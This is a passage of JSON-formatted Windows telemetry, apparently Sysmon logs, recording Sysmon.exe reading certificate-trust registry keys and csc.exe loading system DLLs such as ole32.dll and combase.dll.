131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859650000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 